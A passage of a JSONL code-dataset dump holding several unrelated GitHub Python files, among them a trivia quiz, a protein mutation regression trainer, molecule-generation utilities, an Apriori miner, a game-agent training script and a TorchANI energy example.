question\n print(f\"\\nQuestion {question_num}: {html.unescape(question['question'])}\")\n for i, option in enumerate(options):\n print(f\" {i+1}. {option}\")\n\n valid_selection = False\n selected_num: int = -1\n print(\"\\nPlease select an option:\")\n\n # Get user input (validated)\n while not valid_selection:\n selected_option = input(\"> \")\n\n if not selected_option.isnumeric() or not 0 < int(selected_option) <= len(\n options\n ):\n print(\"Invalid selection. Please try again.\")\n continue\n\n selected_num = int(selected_option) - 1\n valid_selection = True\n\n # Check if answer is correct\n if options[selected_num] == correct_answer:\n print(\"You are correct!\")\n answered_correctly += 1\n else:\n print(f\"Incorrect! The correct answer was {correct_answer}.\")\n\n question_num += 1\n\n # Display final result\n print(f\"\\n*** You answered {answered_correctly} of {total_questions} correctly ***\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"bellicose100xp/CAP_Python_Linux","sub_path":"trivia/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39800054688","text":"import pytorch_lightning as pl\nimport torch.nn\n\nfrom modules.bio.model import *\nfrom modules.ddd.model import *\n\n\nclass ProteinMutationTrainer(pl.LightningModule):\n\n def __init__(self, train_dataset=None, val_dataset=None, encoder_dims=(32, 64, 128), encoder_grids=(32, 16, 8),\n encoder_dim=128, learning_rate=1e-4, min_lr_rate=0.5, epochs=30, steps=1000, batch_size=32,\n unique_atoms=36, atoms_embedding_dim=128, generated_features=48, seq_len=401, regression_blocks=8,\n regression_dim=256, seq_agg=4, regression_out_dims=(512, 256, 128), acids=20, acid_embedding_dim=128,\n pe_powers=16):\n super(ProteinMutationTrainer, self).__init__()\n\n self.save_hyperparameters(ignore=['train_dataset', 'val_dataset'])\n\n self.train_dataset = train_dataset\n self.val_dataset = val_dataset\n self.learning_rate = learning_rate\n self.min_lr_rate = min_lr_rate\n self.epochs = epochs\n self.steps = steps\n self.batch_size = batch_size\n self.pe_powers = pe_powers\n\n self.atom_embeds = torch.nn.Embedding(num_embeddings=unique_atoms + 1, embedding_dim=atoms_embedding_dim,\n padding_idx=unique_atoms)\n self.acid_embeds = torch.nn.Embedding(num_embeddings=acids + 1, embedding_dim=acid_embedding_dim,\n padding_idx=acids)\n self.point_encoder = MultiPointVoxelCNN(input_dim=generated_features + atoms_embedding_dim,\n dim=encoder_dim,\n dims=encoder_dims, grids=encoder_grids, do_points_map=True)\n self.point_regression = PointRegression(input_dim=3 * (encoder_dim + pe_powers * 3 + acid_embedding_dim),\n hidden_dim=regression_dim,\n seq_len=seq_len, n_blocks=regression_blocks, agg_dim=seq_agg,\n out_dims=regression_out_dims)\n\n def forward(self, batch):\n # get embeddings for atoms in space\n wt_atoms, mut_atoms = self.atom_embeds(batch['wt_atom_ids'].long()), \\\n self.atom_embeds(batch['mut_atom_ids'].long())\n # construct features with atom embeddings and nerf like positional encodings\n # WILD-TYPE\n wt_features = torch.cat([batch['wt_features'], wt_atoms], dim=-1)\n wt_grids = self.point_encoder.voxelize(batch['wt_points'], wt_features, mask=batch['wt_mask'])\n wt_features = self.point_encoder.devoxelize(batch['wt_alpha_points'], wt_grids, mask=batch['wt_alpha_mask'])\n wt_pos_features = get_positional_encoding(batch['wt_alpha_points'], self.pe_powers * 3)\n wt_pos_features = torch.where(batch['wt_alpha_mask'].unsqueeze(-1), wt_pos_features,\n torch.zeros_like(wt_pos_features))\n wt_features = torch.cat([wt_features, wt_pos_features, self.acid_embeds(batch['wt_acids'])], dim=-1)\n # MUTANT encoding\n mut_features = torch.cat([batch['mut_features'], mut_atoms], dim=-1)\n mut_grids = self.point_encoder.voxelize(batch['mut_points'], mut_features, mask=batch['mut_mask'])\n mut_features = self.point_encoder.devoxelize(batch['mut_alpha_points'], mut_grids, mask=batch['mut_alpha_mask'])\n mut_pos_features = get_positional_encoding(batch['mut_alpha_points'], self.pe_powers * 3)\n mut_pos_features = torch.where(batch['mut_alpha_mask'].unsqueeze(-1), mut_pos_features,\n torch.zeros_like(mut_pos_features))\n mut_features = torch.cat([mut_features, mut_pos_features, self.acid_embeds(batch['mut_acids'])], dim=-1)\n # Features concat\n features = torch.cat([wt_features, mut_features, wt_features - mut_features], dim=-1)\n # do regression on volume features with masking\n feature_mask = torch.logical_or(batch['wt_alpha_mask'], batch['mut_alpha_mask'])\n preds = self.point_regression(features, mask=feature_mask)\n return {\n 'pred': preds\n }\n\n def shared_step(self, batch, kind='train'):\n out = self.forward(batch)\n loss = torch.nn.functional.mse_loss(batch['dT'], out['pred'])\n self.log(f'{kind}_loss', loss, prog_bar=True, sync_dist=True)\n return loss\n\n def training_step(self, batch, batch_idx):\n return self.shared_step(batch)\n\n def validation_step(self, batch, batch_idx):\n return self.shared_step(batch)\n\n def configure_optimizers(self):\n opt = torch.optim.Adam(params=self.parameters(), lr=self.learning_rate, betas=(0.9, 0.99))\n scheduler = torch.optim.lr_scheduler.OneCycleLR(opt, max_lr=self.learning_rate,\n pct_start=3 / self.epochs, div_factor=2.0,\n final_div_factor=1 / (2.0 * self.min_lr_rate),\n epochs=self.epochs, steps_per_epoch=self.steps)\n scheduler = {\n 'scheduler': scheduler,\n 'interval': 'step'\n }\n return [opt], [scheduler]\n\n def train_dataloader(self):\n return torch.utils.data.DataLoader(self.train_dataset, batch_size=self.batch_size, shuffle=False,\n num_workers=torch.cuda.device_count() * 2,\n pin_memory=True, drop_last=False, prefetch_factor=2)\n\n def val_dataloader(self):\n return torch.utils.data.DataLoader(self.val_dataset, batch_size=self.batch_size, shuffle=False,\n num_workers=torch.cuda.device_count() * 2,\n pin_memory=True, drop_last=False, prefetch_factor=2)\n","repo_name":"sthfaceless/explore","sub_path":"modules/bio/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":5908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17813560109","text":"import torch\nimport numpy as np\nimport random\nimport pandas as pd\n\n# my files\nfrom property_handler import property_calc, similarity_calc, smiles2fingerprint, is_valid_molecule\n\n\n# set seed\ndef set_seed(seed):\n torch.manual_seed(seed)\n random.seed(seed)\n random.SystemRandom(seed)\n np.random.seed(seed)\n np.random.RandomState(seed)\n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n torch.backends.cudnn.enabled = False\n torch.backends.cudnn.benchmark = False\n torch.backends.cudnn.deterministic = True\n\n\n# generate output molecule from input molecule\ndef input2output(args, input_batch, model_in, T, model_out, random_seed_list=None, max_out_len=90, recover_seed=True):\n # prepare input\n input_batch = tuple(data.to(model_in.device) for data in input_batch)\n\n if args.use_fp and args.use_EETN:\n # prepare finger prints\n input_batch_fp_str = [smiles2fingerprint(model_in.tensor2string(input), fp_translator=True) for input in input_batch]\n input_batch_fp = torch.tensor([[float(dig) for dig in fp_mol] for fp_mol in input_batch_fp_str]).to(\n model_in.device)\n input_batch_fp = input_batch_fp.detach()\n else:\n input_batch_fp = None\n\n random_seed_list = args.seed if random_seed_list is None else random_seed_list\n output_batch = []\n for seed in random_seed_list:\n # set seed\n set_seed(seed)\n if args.conditional:\n translated_batch_emb = input_batch_fp\n else:\n # embedder encode (METN)\n input_batch_emb, _ = model_in.forward_encoder(input_batch)\n\n if args.use_EETN:\n # embedding translator (EETN)\n translated_batch_emb = T(input_batch_emb, input_batch_fp)\n else:\n translated_batch_emb = input_batch_emb\n\n # embedder decode (decode test = input is and multi for next char + embedding) (METN)\n output_batch += model_out.decoder_test(max_len=max_out_len, embedding=translated_batch_emb)\n\n if recover_seed is True:\n set_seed(args.seed)\n return output_batch\n\n\n\n# generate intermediate embeddings and output from input\ndef input2all(args, input_batch, model_in, T, model_out, max_out_len=90):\n # prepare input\n input_batch = tuple(data.to(model_in.device) for data in input_batch)\n\n if args.use_fp and args.use_EETN:\n # prepare finger prints\n input_batch_fp_str = [smiles2fingerprint(model_in.tensor2string(input), fp_translator=True) for input in input_batch]\n input_batch_fp = torch.tensor([[float(dig) for dig in fp_mol] for fp_mol in input_batch_fp_str]).to(\n model_in.device)\n input_batch_fp = input_batch_fp.detach()\n else:\n input_batch_fp = None\n\n # embedder encode (METN)\n input_batch_emb, _ = model_in.forward_encoder(input_batch)\n\n if args.use_EETN:\n # embedding translator (EETN)\n translated_batch_emb = T(input_batch_emb, input_batch_fp)\n else:\n translated_batch_emb = input_batch_emb\n\n # embedder decode (decode test = input is and multi for next char + embedding) (METN)\n output_batch = model_out.decoder_test(max_len=max_out_len, embedding=translated_batch_emb)\n\n return input_batch_emb, translated_batch_emb, output_batch\n\n\n# check if output molecule is novel (different form the input molecule and not in trainset)\ndef is_novel(input_mol_smiles, output_mol_smiles, trainset):\n return (input_mol_smiles != output_mol_smiles) and (output_mol_smiles not in trainset)\n\n\n# generate a list with length random integers, each one from [0,100000]\ndef get_random_list(length, last=100000):\n return [random.randint(0, last) for i in range(length)]\n\n\ndef generate_results_file(test_loader, input2output_func, input2smiles, results_file_path):\n in_mols, out_mols = [], []\n for i, input_batch in enumerate(test_loader):\n current_batch_size = len(input_batch)\n\n # generate output batch\n output_batch = input2output_func(input_batch)\n\n # for every input molecule\n for j, input in enumerate(input_batch):\n input_molecule_smiles = input2smiles(input) # to smiles\n output_molecule_smiles_list = output_batch[j::current_batch_size]\n\n out_mols.extend(output_molecule_smiles_list)\n in_mols.extend([input_molecule_smiles] * len(output_molecule_smiles_list))\n\n results = pd.DataFrame(list(zip(in_mols, out_mols)))\n results.to_csv(results_file_path, index=False, header=False, sep=' ')\n\n\ndef process_results_file(res_file_path, args, valid_res_file_path, trainset):\n res_df = pd.read_csv(res_file_path, header=None, delimiter=' ')\n res_df.rename(columns={0: 'input', 1: 'output'}, inplace=True)\n\n # filter valid molecules\n valid_res_def = res_df[np.vectorize(is_valid_molecule)(res_df['output'], args.property)]\n\n if valid_res_def.empty:\n valid_res_def = pd.DataFrame(columns=['input', 'output', args.property, 'sim', 'novel'])\n valid_res_def = valid_res_def.append({'input':'invalid', 'output':'invalid', args.property:0, 'sim':0, 'novel':0}, ignore_index=True)\n else:\n # add property column for output molecules\n valid_res_def[args.property] = np.vectorize(property_calc)(valid_res_def['output'], args.property)\n\n # add similarity between input and output molecules column\n valid_res_def['sim'] = np.vectorize(similarity_calc)(valid_res_def['input'], valid_res_def['output'])\n\n # add novelty column for output molecules\n valid_res_def['novel'] = np.vectorize(is_novel)(valid_res_def['input'], valid_res_def['output'], trainset)\n\n # save output df\n valid_res_def.to_csv(valid_res_file_path, index=False)\n\n\n# calculate metrics\ndef valid_results_file_to_metrics(valid_res_file_path, args, num_source_mols):\n valid_df = pd.read_csv(valid_res_file_path)\n\n validity, diversity, novelty, property, similarity, SR = [], [], [], [], [], []\n for retry_i in range(10):\n validity_mean, diversity_mean, novelty_mean, property_mean, similarity_mean, SR_mean = \\\n get_metics_for_sample(valid_df, args, how_many_samples=1, num_source_mols=num_source_mols, seed=retry_i)\n\n validity.append(validity_mean)\n diversity.append(diversity_mean)\n novelty.append(novelty_mean)\n property.append(property_mean)\n similarity.append(similarity_mean)\n SR.append(SR_mean)\n\n validity_np, diversity_np, novelty_np, property_np, similarity_np, SR_np = np.array(validity), \\\n np.array(diversity), np.array(novelty), np.array(property), np.array(similarity), np.array(SR)\n return validity_np.mean(), validity_np.std(), \\\n diversity_np.mean(), diversity_np.std(), \\\n novelty_np.mean(), novelty_np.std(), \\\n property_np.mean(), property_np.std(), \\\n similarity_np.mean(), similarity_np.std(), \\\n SR_np.mean(), SR_np.std()\n\ndef get_metics_for_sample(valid_df, args, how_many_samples, num_source_mols, seed):\n # shuffle\n valid_df = valid_df.sample(len(valid_df), replace=False, random_state=seed)\n\n # get sample for each source molecule\n valid_df = valid_df.groupby(['input'], as_index=False).head(how_many_samples)\n num_valid_mols = len(valid_df)\n\n # get unique output molecules\n unique_out_mols = valid_df['output'].unique()\n\n # calculate *** VALIDITY ***\n validity = num_valid_mols / num_source_mols\n\n # calculate *** DIVERSITY ***\n diversity = len(unique_out_mols) / num_valid_mols\n\n # calculate *** SR ***\n SR = len(valid_df[(valid_df['sim'] > args.SR_similarity) & (valid_df[args.property] > args.SR_property_val) & (valid_df['novel'])]) / num_valid_mols\n\n return validity, diversity, valid_df['novel'].mean(), valid_df[args.property].mean(), valid_df['sim'].mean(), SR","repo_name":"guy-ba/UGMMT","sub_path":"common_utils.py","file_name":"common_utils.py","file_ext":"py","file_size_in_byte":7845,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"29514298907","text":"class Solution(object):\n def removeElement(self, nums, val):\n \"\"\"\n :type nums: List[int]\n :type val: int\n :rtype: int\n \"\"\"\n count = 0\n return_array = []\n i = 0\n for i in range (len(nums)):\n if (nums[i] != val):\n count = count + 1\n return_array.append(nums[i])\n nums[:] = return_array\n return count\n","repo_name":"khcheng2018/Leetcode_training","sub_path":"remove_element/remove_element.py","file_name":"remove_element.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22675649096","text":"def d(n, sequence, memo):\n if n == 1:\n return memo[0]\n\n for i in range(1, n):\n memo[i] = max(memo[i - 1] + int(sequence[i]), int(sequence[i]))\n\n max_result = memo[0]\n for i in range(n):\n max_result = max(max_result, memo[i])\n\n return max_result\n\n\nn = int(input())\nsequence = input().split(' ')\nmemo = [None] * 100000\nmemo[0] = int(sequence[0])\n\nprint(d(n, sequence, memo))\n","repo_name":"ino-jeong/study-practice","sub_path":"baekjoon online judge/01912 series_sum/series_sum(2).py","file_name":"series_sum(2).py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22367474722","text":"#**kwargs parameter tha packs all arguments into a dictionary\n#so that a fucntion can accepsta varying amount of keyword arguments\n\ndef hello(**kwargs):\n print(\"Hello \" + kwargs['first'] + \" \" + kwargs['last'])\n print(\"Hello\", end=\" \")\n for key, value in kwargs.items():\n print(value, end=\" \")\n\nhello(title = \"Miss.\", first=\"Gloria\", middle=\"Moraa\", last=\"Riechi\")\nprint(\"\\n\")\n\nprice = 1000000\n\ngoodCredit = False\n\nif goodCredit:\n down_payment = int(0.1 * price)\nelse:\n down_payment = int(0.2 * price)\n\nprint(\"The down payment for this buyer is\", str(down_payment) + \" dollars\")\n\nhighIncome = True\ngood_credit = False\n\nif good_credit and not highIncome:\n print(\"Customer is eligible for a loan\")\nelse:\n print(\"Customer is not eligible for a loan\")\n\nname1 = input(\"Please enter your name \")\n\nif len(name1) < 3:\n print(\"Name must be more than three characters\")\nelif len(name1) > 50:\n print(\"Name must be less than fifty characters\")\nelse:\n print(\"Name looks good!\")\n\nweight = input(\"Please enter your weight \")\nunit = input(\"Lbs or kgs \")\n \nif unit.lower() == \"kgs\":\n weight_lbs = float(weight) * 2.20462262185\n print(\"You weigh\", str(weight_lbs) + \" pounds\")\nelse:\n weight_kgs = float(weight) / 2.20462262185\n print(\"You weigh\", str(weight_kgs) + \" kilograms\")\n\n#handling errors\ntry:\n age = int(input(\"Age: \"))\n print(age)\n income = int(input(\"Income: \"))\n risk = income / age\nexcept ZeroDivisionError:\n print(\"Age cannot be zero\")\nexcept ValueError:\n print(\"Invalid value\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Gloriariechi99/MIni-Projects","sub_path":"main4.py","file_name":"main4.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19418357686","text":"\nclass Apriori:\n \"\"\"\n\n \"\"\"\n\n def __init__(self, param: dict):\n self.dbase = param\n self.reset()\n\n def reset(self):\n \"\"\"\n candidates = table TID ensembles d'itemsets\n current = table itemsets TIDs\n \"\"\"\n self.candidates_sz = 1\n self.support_history = {}\n self.candidates = {}\n self.current = {}\n\n for x in self.dbase:\n self.candidates[x] = [(a,) for a in self.dbase[x]]\n\n for x, v in self.candidates.items():\n for itemset in v:\n if itemset in self.current:\n self.current[itemset].add(x)\n else:\n self.current[itemset] = set([x])\n\n def support(self, minsupp: float) -> dict:\n assert 0 <= minsupp <= 1\n \"\"\"on fait le nombre d'occurrences divisées par la taille de la base\n len(dbase) taille de la base \n pr connaitre nb de transactions on calcule la longueur de current(x)\n \"\"\"\n a = {x: len(v) / len(self.dbase) for x, v in self.current.items()}\n return {x: v for x, v in a.items() if v >= minsupp}\n\n def scan_dbase(self, minsupp: float):\n \"\"\"\n mettre à jour support_history avec update en fonction de la\n fréquence en paramètre, mettre à jour current\n \"\"\"\n new_support = self.support(minsupp)\n self.support_history.update(new_support)\n self.current = {x: v for x, v in self.current.items(\n ) if x in new_support.keys()}\n\n def Lk(self) -> list:\n \"\"\"\n renvoie la liste triée des clés de self.current\n \"\"\"\n return sorted(self.current.keys())\n\n def cross_product(self):\n Lk = self.Lk()\n k = self.candidates_sz\n p = len(self.current)\n\n futur = {}\n for i in range(p):\n for j in range(i+1, p):\n if (Lk[i][:k-1] == Lk[j][:k-1]):\n new = Lk[i] + (Lk[j][-1], )\n if all(new[:m]+new[m+1:] in Lk for m in range(k+1)):\n tid_i = self.current[Lk[i]]\n tid_j = self.current[Lk[j]]\n futur[new] = tid_i.intersection(tid_j)\n\n if futur:\n self.current = futur\n self.candidates = {}\n \n tids = list({x for v in self.current.values() for x in v})\n for tid in tids:\n self.candidates[tid] = [\n w for w, v in self.current.items() if tid in v]\n self.candidates_sz += 1\n\n def main(self, minsupp: float) -> list:\n self.reset()\n main = []\n sz = self.candidates_sz\n while sz == self.candidates_sz:\n self.scan_dbase(minsupp)\n Lk = list(self.Lk())\n if Lk:\n main.append(Lk)\n self.cross_product()\n sz += 1\n return main\n","repo_name":"aymankr/ia-miashs","sub_path":"panier/apriori.py","file_name":"apriori.py","file_ext":"py","file_size_in_byte":2893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72226357868","text":"import argparse\nimport datetime\nimport logging\nimport math\nimport os\nimport random\nimport sys\n\nimport numpy as np\n\nimport torch\n\nfrom torch import nn\nfrom torch.utils.data import Dataset\nfrom torch.optim import SGD, Adam\nfrom torch.utils.data import DataLoader\n# from torch.utils.tensorboard import SummaryWriter\n\nfrom droidblue.core.basecls import PlayerId\nfrom droidblue.core.agent import RandomAgent\nfrom droidblue.core.game import Game\n\nfrom .battlecruiser import BattleCruiserState, BattleCruiserAgent, BattleCruiserPlaceModel, BattleCruiserShotModel, BattleCruiserShotEdge\n\nlog = logging.getLogger(__name__)\n# log.setLevel(logging.WARN)\nlog.setLevel(logging.INFO)\nlog.setLevel(logging.DEBUG)\n\n\nclass BattleCruiserDataset(Dataset):\n def __init__(self, event_type, placeModel_path = \"droidblue/games/bc/BattleCruiserPlaceModel-latest.state\", shotModel_path = \"droidblue/games/bc/BattleCruiserShotModel-latest.state\"):\n self.event_type = event_type\n self.agents = [\n BattleCruiserAgent(placeModel_path, shotModel_path),\n BattleCruiserAgent(placeModel_path, shotModel_path),\n ]\n\n def __len__(self):\n return 128 * 128\n\n def __getitem__(self, ndx):\n game = Game(BattleCruiserState, self.agents)\n game.playGame()\n\n trainable_nodes = [node for node in game.played_nodes if self.event_type in node.edgeType_to_trainingSample_dict]\n\n if not trainable_nodes:\n print(f\"len(game.played_nodes): {len(game.played_nodes)}\")\n for node in game.played_nodes:\n print(f\"node.edgeType_to_trainingSample_dict: {node.edgeType_to_trainingSample_dict}\")\n\n chosen_node = random.choice(trainable_nodes)\n\n inputs, labels, outputs = chosen_node.edgeType_to_trainingSample_dict[self.event_type]\n\n final_score = game.current_node.state.getFinalScore(chosen_node.state.active_player)\n labels.append(np.array([final_score], dtype=np.float32))\n\n input_tup = tuple(torch.from_numpy(x) for x in inputs)\n label_tup = tuple(torch.from_numpy(x) for x in labels)\n\n training_sample = input_tup, label_tup\n\n return training_sample\n\n\n\n\nclass TrainingApp:\n def __init__(self, sys_argv=None):\n if sys_argv is None:\n sys_argv = sys.argv[1:]\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--num-workers',\n help='Number of worker processes for background data loading',\n default=4,\n type=int,\n )\n parser.add_argument('--batch-size',\n help='Batch size to use for training',\n default=128,\n type=int,\n )\n parser.add_argument('--epochs',\n help='Number of epochs to train for',\n default=30,\n type=int,\n )\n\n parser.add_argument('--tb-prefix',\n default='p2ch11',\n help=\"Data prefix to use for Tensorboard run. Defaults to chapter.\",\n )\n\n parser.add_argument('comment',\n help=\"Comment suffix for Tensorboard run.\",\n nargs='?',\n default='dwlpt',\n )\n self.cli_args = parser.parse_args(sys_argv)\n self.time_str = datetime.datetime.now().strftime('%Y-%m-%d_%H.%M.%S')\n\n self.trn_writer = None\n self.val_writer = None\n self.totalTrainingSamples_count = 0\n\n # self.use_cuda = False\n self.use_cuda = torch.cuda.is_available()\n self.device = torch.device(\"cuda\" if self.use_cuda else \"cpu\")\n\n self.model = self.initModel()\n self.optimizer = self.initOptimizer()\n\n def initModel(self):\n model = BattleCruiserShotModel()\n\n if self.use_cuda:\n log.info(\"Using CUDA with {} devices.\".format(torch.cuda.device_count()))\n if torch.cuda.device_count() > 1:\n model = nn.DataParallel(model)\n model = model.to(self.device)\n return model\n\n def initOptimizer(self):\n # return SGD(self.model.parameters(), lr=0.001, momentum=0.99)\n return Adam(self.model.parameters())\n\n def initTrainDl(self):\n train_ds = BattleCruiserDataset(BattleCruiserShotEdge)\n\n batch_size = self.cli_args.batch_size\n if self.use_cuda:\n batch_size *= torch.cuda.device_count()\n\n train_dl = DataLoader(\n train_ds,\n batch_size=batch_size,\n num_workers=self.cli_args.num_workers,\n pin_memory=self.use_cuda,\n )\n\n return train_dl\n\n def initValDl(self):\n val_ds = BattleCruiserDataset(BattleCruiserShotEdge)\n\n batch_size = self.cli_args.batch_size\n if self.use_cuda:\n batch_size *= torch.cuda.device_count()\n\n val_dl = DataLoader(\n val_ds,\n batch_size=batch_size,\n num_workers=self.cli_args.num_workers,\n pin_memory=self.use_cuda,\n )\n\n return val_dl\n\n # def initTensorboardWriters(self):\n # if self.trn_writer is None:\n # log_dir = os.path.join('runs', self.cli_args.tb_prefix, self.time_str)\n #\n # self.trn_writer = SummaryWriter(\n # log_dir=log_dir + '-trn_cls-' + self.cli_args.comment)\n # self.val_writer = SummaryWriter(\n # log_dir=log_dir + '-val_cls-' + self.cli_args.comment)\n\n\n def main(self):\n log.info(\"Starting {}, {}\".format(type(self).__name__, self.cli_args))\n\n train_dl = self.initTrainDl()\n val_dl = self.initValDl()\n\n # self.initTensorboardWriters()\n\n epoch_ndx = None\n for epoch_ndx in range(1, self.cli_args.epochs + 1):\n\n log.info(\"Epoch {} of {}, {}/{} batches of size {}*{}\".format(\n epoch_ndx,\n self.cli_args.epochs,\n len(train_dl),\n len(val_dl),\n self.cli_args.batch_size,\n (torch.cuda.device_count() if self.use_cuda else 1),\n ))\n\n self.doTraining(epoch_ndx, train_dl)\n # self.logMetrics(epoch_ndx, 'trn', trnMetrics_t)\n\n # self.doValidation(epoch_ndx, val_dl)\n # self.logMetrics(epoch_ndx, 'val', valMetrics_t)\n\n # if hasattr(self, 'trn_writer'):\n # self.trn_writer.close()\n # self.val_writer.close()\n\n state = {\n 'sys_argv': sys.argv,\n 'time': str(datetime.datetime.now()),\n 'model_state': self.model.state_dict(),\n 'model_name': type(self.model).__name__,\n 'optimizer_state' : self.optimizer.state_dict(),\n 'optimizer_name': type(self.optimizer).__name__,\n 'epoch': epoch_ndx,\n # 'totalTrainingSamples_count': self.totalTrainingSamples_count,\n }\n save_path = f\"droidblue/games/bc/{type(self.model).__name__}-0vs0-v1.state\"\n last_path = f\"droidblue/games/bc/{type(self.model).__name__}-latest.state\"\n torch.save(state, save_path)\n torch.save(state, last_path)\n\n agents = [\n BattleCruiserAgent(None, save_path),\n RandomAgent(),\n ]\n wins = 0\n games = 100\n\n for i in range(games):\n game = Game(BattleCruiserState, agents)\n game.playGame()\n\n wins += game.current_node.state.getFinalScore(PlayerId(0)) > 0\n\n log.info(f\"wins: {wins}\")\n\n\n def doTraining(self, epoch_ndx, train_dl):\n self.model.train()\n # trnMetrics_g = torch.zeros(\n # METRICS_SIZE,\n # len(train_dl.dataset),\n # device=self.device,\n # )\n\n # batch_iter = enumerateWithEstimate(\n # train_dl,\n # \"E{} Training\".format(epoch_ndx),\n # start_ndx=train_dl.num_workers,\n # )\n # for batch_ndx, batch_tup in batch_iter:\n total_loss = 0.0\n for batch_ndx, batch_tup in enumerate(train_dl):\n self.optimizer.zero_grad()\n\n input_tup, label_tup = batch_tup\n\n input_gtup = tuple(x.to(self.device, non_blocking=True) for x in input_tup)\n label_gtup = tuple(x.to(self.device, non_blocking=True) for x in label_tup)\n\n output_g = self.model(*input_gtup)\n\n loss_func = nn.MSELoss()\n loss_g = loss_func(\n output_g[0],\n label_gtup[0],\n )\n\n loss_g.backward()\n self.optimizer.step()\n\n total_loss += loss_g.item()\n\n log.info(f\"Training loss: {total_loss}\")\n\n\n def doValidation(self, epoch_ndx, val_dl):\n self.model.eval()\n # trnMetrics_g = torch.zeros(\n # METRICS_SIZE,\n # len(train_dl.dataset),\n # device=self.device,\n # )\n\n # batch_iter = enumerateWithEstimate(\n # train_dl,\n # \"E{} Training\".format(epoch_ndx),\n # start_ndx=train_dl.num_workers,\n # )\n # for batch_ndx, batch_tup in batch_iter:\n with torch.no_grad():\n for batch_ndx, batch_tup in enumerate(val_dl):\n input_tup, label_tup, metadata_tup = batch_tup\n\n input_t = input_tup[0]\n label_t = label_tup[0]\n\n input_g = input_t.to(self.device, non_blocking=True)\n label_g = label_t.to(self.device, non_blocking=True)\n\n output_g = self.model(input_g)\n\n loss_func = nn.MSELoss()\n loss_g = loss_func(\n output_g,\n label_g,\n )\n\n\n print(\"Validation loss:\", loss_g.item())\n\nif __name__ == '__main__':\n TrainingApp().main()\n","repo_name":"elistevens/xwing-droidblue","sub_path":"droidblue/games/bc/battlecruiser_training_place.py","file_name":"battlecruiser_training_place.py","file_ext":"py","file_size_in_byte":9767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19366066709","text":"# -*- coding: utf-8 -*-\n\"\"\"\nComputing Energy and Force Using Builtin Models\n===============================================\n\nTorchANI has a model ensemble trained by NeuroChem on the `ANI-1x dataset`_.\nThese models are shipped with TorchANI and can be used directly.\n\n.. _ANI-1x dataset:\n https://aip.scitation.org/doi/abs/10.1063/1.5023802\n\"\"\"\n\n###############################################################################\n# To begin with, let's first import the modules we will use:\nimport torch\nimport torchani\n\n###############################################################################\n# Let's now manually specify the device we want TorchANI to run:\ndevice = torch.device('cpu')\n\n###############################################################################\n# Let's now load the built-in models and create a pipeline of AEV computer,\n# neural networks, and energy shifter. This pipeline will first compute AEV,\n# then use all models in the ensemble to compute molecular energies, and take\n# the average of these energies to obtain a final output. The reason we need an\n# energy shifter in the end is that the output of these networks is not the\n# total energy but the total energy subtracted by a self energy for each atom.\nbuiltin = torchani.neurochem.Builtins()\nmodel = torch.nn.Sequential(\n builtin.aev_computer,\n builtin.models,\n builtin.energy_shifter\n)\n\n###############################################################################\n# Now let's define the coordinate and species. If you just want to compute the\n# energy and force for a single structure like in this example, you need to\n# make the coordinate tensor has shape ``(1, Na, 3)`` and species has shape\n# ``(1, Na)``, where ``Na`` is the number of atoms in the molecule, the\n# preceding ``1`` in the shape is here to support batch processing like in\n# training. If you have ``N`` different structures to compute, then make it\n# ``N``.\ncoordinates = torch.tensor([[[0.03192167, 0.00638559, 0.01301679],\n [-0.83140486, 0.39370209, -0.26395324],\n [-0.66518241, -0.84461308, 0.20759389],\n [0.45554739, 0.54289633, 0.81170881],\n [0.66091919, -0.16799635, -0.91037834]]],\n requires_grad=True, device=device)\nspecies = builtin.consts.species_to_tensor('CHHHH').to(device).unsqueeze(0)\n\n###############################################################################\n# Now let's compute energy and force:\n_, energy = model((species, coordinates))\nderivative = torch.autograd.grad(energy.sum(), coordinates)[0]\nforce = -derivative\n\n###############################################################################\n# And print to see the result:\nprint('Energy:', energy.item())\nprint('Force:', force.squeeze())\n","repo_name":"0ut0fcontrol/torchani","sub_path":"examples/energy_force.py","file_name":"energy_force.py","file_ext":"py","file_size_in_byte":2831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"7970075549","text":"from app.models import db, Comment\n\n\ndef seed_comments():\n comment1 = Comment(\n comment='Wow, amazing track!',\n song_id=1,\n user_id=1\n )\n comment2 = Comment(\n comment='Outstanding',\n song_id=2,\n user_id=1\n )\n comment3 = Comment(\n comment='This one is my absolute favorite!',\n song_id=3,\n user_id=1\n )\n comment4 = Comment(\n comment='Good stuff',\n song_id=4,\n user_id=1\n )\n db.session.add(comment1)\n db.session.add(comment2)\n db.session.add(comment3)\n db.session.add(comment4)\n db.session.commit()\n\n\ndef undo_comments():\n db.session.execute('TRUNCATE comments RESTART IDENTITY CASCADE;')\n db.session.commit()\n","repo_name":"nathanblaz/tunevillage-app","sub_path":"app/seeds/comments.py","file_name":"comments.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"69876989867","text":"import sys\nimport math\n\n\n# Grab Snaffles and try to throw them through the opponent's goal!\n# Move towards a Snaffle and use your team id to determine where you need to throw it.\n\nclass Point2D(object):\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def square_distance(self, other_point):\n \"\"\" Calculates the square distance between this Point2D and another Point2D\n\n :param other_point: The other Point2D\n :return: The Square 